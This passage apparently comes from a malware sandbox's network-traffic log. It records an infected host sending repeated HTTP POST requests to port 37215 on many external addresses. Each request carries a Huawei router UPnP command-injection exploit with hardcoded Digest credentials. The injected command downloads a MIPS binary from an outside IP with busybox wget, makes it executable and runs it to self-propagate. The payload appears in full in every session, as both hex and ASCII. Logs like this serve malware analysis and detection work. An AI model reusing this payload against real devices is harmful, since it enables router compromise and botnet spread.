69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  308192.168.2.1351362197.35.81.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227765083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  309192.168.2.133966241.103.15.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227781057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  310192.168.2.1350590157.171.162.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227797985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  311192.168.2.1345962157.125.160.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227823019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  312192.168.2.1336636197.20.197.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227844954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  313192.168.2.1356224204.219.106.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227866888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  314192.168.2.1335674157.44.116.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227889061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  315192.168.2.1353628180.163.208.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227911949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  316192.168.2.1341150206.157.181.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227925062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  317192.168.2.1345338157.182.94.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227951050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  318192.168.2.1346688197.29.189.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227974892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
